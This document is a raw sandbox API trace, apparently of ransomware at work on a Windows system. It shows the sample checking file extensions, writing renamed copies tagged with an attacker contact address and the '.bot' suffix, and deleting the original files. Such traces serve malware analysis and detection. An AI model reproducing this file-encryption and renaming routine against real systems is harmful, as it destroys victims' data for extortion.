	[0138.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78
	[0138.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78
	[0138.274] lstrlenW (lpString=".doc") returned 4
	[0138.274] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.274] lstrlenW (lpString=".docx") returned 5
	[0138.274] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1
	[0138.274] lstrlenW (lpString=".pdf") returned 4
	[0138.274] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.274] lstrlenW (lpString=".xls") returned 4
	[0138.274] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.274] lstrlenW (lpString=".xlsx") returned 5
	[0138.274] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1
	[0138.274] lstrlenW (lpString=".ppt") returned 4
	[0138.274] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78
	[0138.274] lstrlenW (lpString=".zip") returned 4
	[0138.274] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.274] lstrlenW (lpString=".rar") returned 4
	[0138.274] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.274] lstrlenW (lpString=".bz2") returned 4
	[0138.274] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.274] lstrlenW (lpString=".7z") returned 3
	[0138.274] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.291] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.291] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.292] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0138.292] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.102] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.769] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.769] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0139.773] GetLastError () returned 0x0
	[0139.773] ReadFile (in: hFile=0x3a4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1384, lpOverlapped=0x0) returned 1
	[0139.785] WriteFile (in: hFile=0x3a8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1390, lpOverlapped=0x0) returned 1
	[0139.786] ReadFile (in: hFile=0x3a4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.786] WriteFile (in: hFile=0x3a8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0139.787] SetEndOfFile (hFile=0x3a8) returned 1
	[0139.787] CloseHandle (hObject=0x3a8) returned 1
	[0139.787] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.787] SetEndOfFile (hFile=0x3a4) returned 1
	[0139.816] CloseHandle (hObject=0x3a4) returned 1
	[0139.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.826] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf")) returned 1
	[0139.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.826] lstrlenW (lpString=".doc") returned 4
	[0139.826] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.826] lstrlenW (lpString=".docx") returned 5
	[0139.826] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.826] lstrlenW (lpString=".pdf") returned 4
	[0139.826] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.826] lstrlenW (lpString=".xls") returned 4
	[0139.826] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.826] lstrlenW (lpString=".xlsx") returned 5
	[0139.826] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.826] lstrlenW (lpString=".ppt") returned 4
	[0139.827] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.827] lstrlenW (lpString=".zip") returned 4
	[0139.827] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.827] lstrlenW (lpString=".rar") returned 4
	[0139.827] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.827] lstrlenW (lpString=".bz2") returned 4
	[0139.827] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.827] lstrlenW (lpString=".7z") returned 3
	[0139.827] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.827] lstrlenW (lpString=".dbf") returned 4
	[0139.827] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.827] lstrlenW (lpString=".1cd") returned 4
	[0139.827] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.827] lstrlenW (lpString=".jpg") returned 4
	[0139.827] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.827] lstrlenW (lpString=".doc") returned 4
	[0139.827] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.827] lstrlenW (lpString=".docx") returned 5
	[0139.827] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.827] lstrlenW (lpString=".pdf") returned 4
	[0139.827] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.827] lstrlenW (lpString=".xls") returned 4
	[0139.827] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.827] lstrlenW (lpString=".xlsx") returned 5
	[0139.827] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.827] lstrlenW (lpString=".ppt") returned 4
	[0139.827] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.828] lstrlenW (lpString=".zip") returned 4
	[0139.828] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.828] lstrlenW (lpString=".rar") returned 4
	[0139.828] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.828] lstrlenW (lpString=".bz2") returned 4
	[0139.828] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.828] lstrlenW (lpString=".7z") returned 3
	[0139.828] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.828] lstrlenW (lpString=".dbf") returned 4
	[0139.828] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.828] lstrlenW (lpString=".1cd") returned 4
	[0139.828] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63
	[0139.828] lstrlenW (lpString=".jpg") returned 4
	[0139.828] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.828] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0139.828] lstrlenW (lpString="AN04385_.WMF") returned 12
	[0139.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0139.829] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=5004) returned 1
	[0139.829] CloseHandle (hObject=0x37c) returned 1
	[0139.829] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf")) returned 0x20
	[0139.829] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0139.829] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.829] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.830] GetLastError () returned 0x0
	[0139.830] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x138c, lpOverlapped=0x0) returned 1
	[0139.836] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1390, lpOverlapped=0x0) returned 1
	[0139.843] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.843] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0139.843] SetEndOfFile (hFile=0x398) returned 1
	[0139.843] CloseHandle (hObject=0x398) returned 1
	[0139.843] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.843] SetEndOfFile (hFile=0x37c) returned 1
	[0139.845] CloseHandle (hObject=0x37c) returned 1
	[0139.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.846] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf")) returned 1
	[0139.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.846] lstrlenW (lpString=".doc") returned 4
	[0139.846] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.846] lstrlenW (lpString=".docx") returned 5
	[0139.846] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.847] lstrlenW (lpString=".pdf") returned 4
	[0139.847] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.847] lstrlenW (lpString=".xls") returned 4
	[0139.847] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.847] lstrlenW (lpString=".xlsx") returned 5
	[0139.847] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.847] lstrlenW (lpString=".ppt") returned 4
	[0139.847] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.847] lstrlenW (lpString=".zip") returned 4
	[0139.847] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.847] lstrlenW (lpString=".rar") returned 4
	[0139.847] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.847] lstrlenW (lpString=".bz2") returned 4
	[0139.847] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.847] lstrlenW (lpString=".7z") returned 3
	[0139.847] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.847] lstrlenW (lpString=".dbf") returned 4
	[0139.847] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.847] lstrlenW (lpString=".1cd") returned 4
	[0139.847] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.847] lstrlenW (lpString=".jpg") returned 4
	[0139.847] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.847] lstrlenW (lpString=".doc") returned 4
	[0139.847] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.847] lstrlenW (lpString=".docx") returned 5
	[0139.847] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.847] lstrlenW (lpString=".pdf") returned 4
	[0139.848] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.848] lstrlenW (lpString=".xls") returned 4
	[0139.848] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.848] lstrlenW (lpString=".xlsx") returned 5
	[0139.848] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.848] lstrlenW (lpString=".ppt") returned 4
	[0139.848] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.848] lstrlenW (lpString=".zip") returned 4
	[0139.848] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.848] lstrlenW (lpString=".rar") returned 4
	[0139.848] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.848] lstrlenW (lpString=".bz2") returned 4
	[0139.848] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.848] lstrlenW (lpString=".7z") returned 3
	[0139.848] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.848] lstrlenW (lpString=".dbf") returned 4
	[0139.848] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.848] lstrlenW (lpString=".1cd") returned 4
	[0139.848] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63
	[0139.848] lstrlenW (lpString=".jpg") returned 4
	[0139.848] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.848] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0139.848] lstrlenW (lpString="BD00141_.WMF") returned 12
	[0139.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0139.849] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=26886) returned 1
	[0139.849] CloseHandle (hObject=0x37c) returned 1
	[0139.849] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf")) returned 0x20
	[0139.849] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0139.850] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.850] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.850] GetLastError () returned 0x0
	[0139.850] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x6906, lpOverlapped=0x0) returned 1
	[0139.852] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x6910, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x6910, lpOverlapped=0x0) returned 1
	[0139.853] ReadFile (in: hFile=0x37c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.853] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0139.853] SetEndOfFile (hFile=0x398) returned 1
	[0139.854] CloseHandle (hObject=0x398) returned 1
	[0139.854] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.854] SetEndOfFile (hFile=0x37c) returned 1
	[0139.859] CloseHandle (hObject=0x37c) returned 1
	[0139.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.859] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf")) returned 1
	[0139.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.860] lstrlenW (lpString=".doc") returned 4
	[0139.860] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.860] lstrlenW (lpString=".docx") returned 5
	[0139.860] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.860] lstrlenW (lpString=".pdf") returned 4
	[0139.860] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.860] lstrlenW (lpString=".xls") returned 4
	[0139.860] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.860] lstrlenW (lpString=".xlsx") returned 5
	[0139.860] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.860] lstrlenW (lpString=".ppt") returned 4
	[0139.860] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.860] lstrlenW (lpString=".zip") returned 4
	[0139.860] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.860] lstrlenW (lpString=".rar") returned 4
	[0139.860] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.860] lstrlenW (lpString=".bz2") returned 4
	[0139.860] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.860] lstrlenW (lpString=".7z") returned 3
	[0139.860] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.860] lstrlenW (lpString=".dbf") returned 4
	[0139.860] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.860] lstrlenW (lpString=".1cd") returned 4
	[0139.860] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63
	[0139.860] lstrlenW (lpString=".jpg") returned 4
	[0139.860] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
